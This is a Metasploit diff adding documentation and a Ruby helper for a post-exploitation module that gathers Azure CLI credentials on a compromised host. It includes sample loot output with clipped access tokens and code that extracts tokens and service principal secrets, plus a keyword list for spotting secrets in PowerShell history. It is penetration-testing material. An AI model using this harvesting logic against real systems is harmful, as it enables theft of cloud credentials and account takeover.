zeroSteiner
diff --git a/‎documentation/modules/post/multi/gather/azure_cli_creds.md
Lines changed: 187 additions & 0 deletions b/‎documentation/modules/post/multi/gather/azure_cli_creds.md
Lines changed: 187 additions & 0 deletions
diff --git a/‎lib/msf/core/post/azure.rb
Lines changed: 97 additions & 0 deletions b/‎lib/msf/core/post/azure.rb
Lines changed: 97 additions & 0 deletions
@@ -0,0 +1,187 @@
+## Vulnerable Application
+
+Any windows, linux, or osx system with a `meterpreter` session and
+
+[Azure CLI 2.0+](https://docs.microsoft.com/en-us/cli/azure/?view=azure-cli-latest).
+
+Successfully tested on:
+
+* Azure CLI 2.0.33 on Windows Server 2012 R2, and Windows 10
+* azure-cli 2.0.33-1.el7 on openSUSE Tumbleweed 20180517
+* Azure CLI 2.61.0 on Windows 10
+* Azure CLI 2.35.0 on [Docker](https://github.com/rapid7/metasploit-framework/pull/10113#issuecomment-2191464809)
+
+## Verification Steps
+
+1. Install Azure CLI
+2. Start msfconsole
+3. Get a `meterpreter` session on some host.
+4. Do: `use post/multi/gather/azure_cli_creds`
+5. Do: `set SESSION [SESSION_ID]`
+6. Do: `run`
+7. If the system has readable configuration files for Azure CLI, they will stored in loot and a summary will be printed to the screen.
+
+## Options
+
+## Scenarios
+
+### A new install of 2.0.33 (empty data files) on Windows 10
+
+```
+[msf](Jobs:0 Agents:1) post(multi/gather/azure_cli_creds) > run
+
+[*] az cli version: 2.0.33
+[*] Looking for az cli data in C:\Users\windows
+[*]   Checking for config files
+[+]     .Azure/config stored in /root/.msf4/loot/20240616175854_default_111.111.1.11_azure.config.ini_081029.txt
+[*]   Checking for context files
+[*]   Checking for profile files
+[+]     .Azure/azureProfile.json stored in /root/.msf4/loot/20240616175855_default_111.111.1.11_azure.profile.js_357740.txt
+[*]   Checking for console history files
+[*] Post module execution completed
+```
+
+### 2.61.0 on Windows 10
+
+```
+msf6 post(multi/gather/azure_cli_creds) > rerun
+[*] Reloading module...
+
+[*] az cli version: 2.61.0
+[*] Looking for az cli data in C:\Users\kali
+[*]   Checking for config files
+[*]   Checking for context files
+[*]   Checking for profile files
+[*]   Checking for console history files
+[+]     C:\Users\kali/AppData/Roaming/Microsoft/Windows/PowerShell/PSReadLine/ConsoleHost_history.txt stored in /root/.msf4/loot/20240624150413_default_111.111.11.111_azure.console_hi_878016.txt
+[*]   Checking for powershell transcript files
+[*] Looking for az cli data in C:\Users\h00die
+[*]   Checking for config files
+[+]     .Azure\config stored in /root/.msf4/loot/20240624150413_default_111.111.11.111_azure.config.ini_539242.txt
+[*]   Checking for context files
+[+]     .Azure/AzureRmContext.json stored in /root/.msf4/loot/20240624150414_default_111.111.11.111_azure.context.js_041230.txt
+[*]   Checking for profile files
+[+]     .Azure/azureProfile.json stored in /root/.msf4/loot/20240624150414_default_111.111.11.111_azure.profile.js_538496.txt
+[*]   Checking for console history files
+[+]     C:\Users\h00die/AppData/Roaming/Microsoft/Windows/PowerShell/PSReadLine/ConsoleHost_history.txt stored in /root/.msf4/loot/20240624150414_default_111.111.11.111_azure.console_hi_210490.txt
+[*]   Checking for powershell transcript files
+[+]     C:\Users\h00die/Documents/PowerShell_transcript.EDLT.Dz6sxz6B.20150720151906.txt stored in /root/.msf4/loot/20240624150415_default_111.111.11.111_azure.transcript_021248.txt
+[+]     C:\Users\h00die/Documents/PowerShell_transcript.EDLT.Dz6sxz6B.20230720151906.txt stored in /root/.msf4/loot/20240624150415_default_111.111.11.111_azure.transcript_743088.txt
+[+] Line 1 may contain sensitive information. Manual search recommended, keyword hit: New-PSSession
+[+] Subscriptions
+=============
+
+ Account Name               Username                              Cloud Name
+ ------------               --------                              ----------
+ EXAMPLE11111               1111111111111-1111-1111-111111111111  AzureCloud
+ N/A(tenant level account)  [email protected]       AzureCloud
+
+[+] Context
+=======
+
+ Username                           Account Type      Access Token                           Graph Access Token                       MS Graph Access Token  Key Vault Token                       Principal Secret
+ --------                           ------------      ------------                           ------------------                       ---------------------  ---------------                       ----------------
+ 1111111111111-1111-1111-111111111  AccessToken       eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiIsI  eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiIsIng                         eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiIs
+ 111                                                  ng1dCI6IkwxS2ZLRklfam5YYndXYzIyeFp4dz  1dCI6IkwxS2ZLRklfam5YYndXYzIyeFp4dzFzVU                         Ing1dCI6IkwxS2ZLRklfam5YYndXYzIyeFp4
+                                                      (clip)                                 (clip)                                                          (clip)
+ [email protected]  User
+ rosoft.com
+ 1111111111111-1111-1111-111111111  ServicePrincipal
+ a1c
+ 1111111111111-1111-1111-111111111  AccessToken       eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiIsI                                                                  eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiIs
+ f40                                                  ng1dCI6IkwxS2ZLRklfam5YYndXYzIyeFp4dz                                                                  Ing1dCI6IkwxS2ZLRklfam5YYndXYzIyeFp4
+                                                      (clip)                                                                                                 (clip)
+ [email protected]  User
+ oft.com
+
+[*] Post module execution completed
+msf6 post(multi/gather/azure_cli_creds) > 
+```
+
+### 2.35.0 on Docker
+
+```
+msf6 post(multi/gather/azure_cli_creds) > run
+
+[!] SESSION may not be compatible with this module:
+[!]  * missing Meterpreter features: stdapi_railgun_api, stdapi_railgun_api_multi, stdapi_railgun_memread, stdapi_railgun_memwrite, stdapi_registry_check_key_exists, stdapi_registry_create_key, stdapi_registry_delete_key, stdapi_registry_enum_key_direct, stdapi_registry_enum_value_direct, stdapi_registry_load_key, stdapi_registry_open_key, stdapi_registry_query_value_direct, stdapi_registry_set_value_direct, stdapi_registry_unload_key, stdapi_sys_config_getprivs
+[*] Unable to determine az cli version
+[*] Looking for az cli data in /bin
+[*]   Checking for config files
+[*]   Checking for context files
+[*]   Checking for profile files
+[*] Looking for az cli data in /dev
+[*]   Checking for config files
+[*]   Checking for context files
+[*]   Checking for profile files
+[*] Looking for az cli data in /home/user
+[*]   Checking for config files
+[+]     .azure/config stored in /home/mtcyr/.msf4/loot/20240627140350_default_172.17.0.2_azure.config.ini_433702.txt
+[*]   Checking for context files
+[*]   Checking for profile files
+[+]     .azure/azureProfile.json stored in /home/mtcyr/.msf4/loot/20240627140350_default_172.17.0.2_azure.profile.js_201042.txt
+[*] Looking for az cli data in /nonexistent
+[*]   Checking for config files
+[*]   Checking for context files
+[*]   Checking for profile files
+[*] Looking for az cli data in /root
+[*]   Checking for config files
+[*]   Checking for context files
+[*]   Checking for profile files
+[*] Looking for az cli data in /usr/games
+[*]   Checking for config files
+[*]   Checking for context files
+[*]   Checking for profile files
+[*] Looking for az cli data in /usr/sbin
+[*]   Checking for config files
+[*]   Checking for context files
+[*]   Checking for profile files
+[*] Looking for az cli data in /var/backups
+[*]   Checking for config files
+[*]   Checking for context files
+[*]   Checking for profile files
+[*] Looking for az cli data in /var/cache/man
+[*]   Checking for config files
+[*]   Checking for context files
+[*]   Checking for profile files
+[*] Looking for az cli data in /var/lib/gnats
+[*]   Checking for config files
+[*]   Checking for context files
+[*]   Checking for profile files
+[*] Looking for az cli data in /var/list
+[*]   Checking for config files
+[*]   Checking for context files
+[*]   Checking for profile files
+[*] Looking for az cli data in /var/mail
+[*]   Checking for config files
+[*]   Checking for context files
+[*]   Checking for profile files
+[*] Looking for az cli data in /var/run/ircd
+[*]   Checking for config files
+[*]   Checking for context files
+[*]   Checking for profile files
+[*] Looking for az cli data in /var/spool/lpd
+[*]   Checking for config files
+[*]   Checking for context files
+[*]   Checking for profile files
+[*] Looking for az cli data in /var/spool/news
+[*]   Checking for config files
+[*]   Checking for context files
+[*]   Checking for profile files
+[*] Looking for az cli data in /var/spool/uucp
+[*]   Checking for config files
+[*]   Checking for context files
+[*]   Checking for profile files
+[*] Looking for az cli data in /var/www
+[*]   Checking for config files
+[*]   Checking for context files
+[*]   Checking for profile files
+[+] Subscriptions
+=============
+
+ Account Name               Username                                          Cloud Name
+ ------------               --------                                          ----------
+ N/A(tenant level account)  [email protected]  AzureCloud
+
+[*] Post module execution completed
+```
@@ -0,0 +1,97 @@
+# -*- coding: binary -*-
+
+module Msf::Post::Azure
+  def process_tokens_file(content)
+    table_data = []
+
+    dic = {}
+    content.each do |item|
+      if dic.key?(item['userId'])
+        dic[item['userId']] = dic[item['userId']] + 1
+      else
+        dic[item['userId']] = 1
+      end
+    end
+    dic.each do |key, value|
+      table_data << [file_path, key, value]
+    end
+
+    table_data
+  end
+
+  #
+  # Processes a hashtable (json) from azureProfile.json
+  #
+  # @param content [Hash] contents of a json file to process
+  # @return [Array]
+  def process_profile_file(content)
+    table_data = []
+
+    # make sure we have keys we expect to
+    return table_data unless content.key? 'subscriptions'
+
+    content['subscriptions'].each do |item|
+      table_data << [item['name'], item.dig('user', 'name'), item['environmentName']]
+    end
+    table_data
+  end
+
+  #
+  # Processes a hashtable (json) generated via Save-AzContext or automatically
+  # generated in AzureRmContext.json
+  #
+  # @param content [Hash] contents of a json file to process
+  # @return [Array]
+  def process_context_contents(content)
+    table_data = []
+
+    # make sure we have keys we expect to
+    return table_data unless content.key? 'Contexts'
+
+    content['Contexts'].each_value do |account|
+      username = account.dig('Account', 'Id')
+      type = account.dig('Account', 'Type')
+      principal_secret = account.dig('Account', 'ExtendedProperties', 'ServicePrincipalSecret') # only in 'ServicePrincipal' types
+      access_token = account.dig('Account', 'ExtendedProperties', 'AccessToken')
+      graph_access_token = account.dig('Account', 'ExtendedProperties', 'GraphAccessToken')
+      # example of parsing these out to get an expiration for the token
+      # unless graph_access_token.nil? || graph_access_token.empty?
+      #   decoded_token = Msf::Exploit::Remote::HTTP::JWT.decode(graph_access_token)
+      #   graph_access_token_exp = Time.at(decoded_token.payload['exp']).to_datetime
+      # end
+      ms_graph_access_token = account.dig('Account', 'ExtendedProperties', 'MicrosoftGraphAccessToken')
+      key_vault_token = account.dig('Account', 'ExtendedProperties', 'KeyVault')
+      table_data.append([username, type, access_token, graph_access_token, ms_graph_access_token, key_vault_token, principal_secret])
+    end
+    table_data
+  end
+
+  #
+  # Print any lines from a ConsoleHost_history.txt file that may have
+  # important information
+  #
+  # @param content [Str] contents of a ConsoleHost_history.txt file
+  # @return Array of strings to print to notify the user about
+  def print_consolehost_history(content)
+    # a list of strings which may contain secrets or other important information
+    commands_of_value = [
+      'System.Management.Automation.PSCredential', # for creating new credentials, may contain username/password
+      'ConvertTo-SecureString', # often used with passwords
+      'Connect-AzAccount', # may contain an access token in line or near it
+      'New-PSSession', # may indicate lateral movement to a new host
+      'commandToExecute', # when used with Set-AzVMExtension and a CustomScriptExtension, may show code execution
+      '-ScriptBlock' # when used with Invoke-Command, may show code execution
+    ]
+
+    output = []
+
+    content.each_line.with_index do |line, index|
+      commands_of_value.each do |command|
+        if line.downcase.include? command.downcase
+          output.append("Line #{index + 1} may contain sensitive information. Manual search recommended, keyword hit: #{command}")
+        end
+      end
+    end
+    output
+  end
+end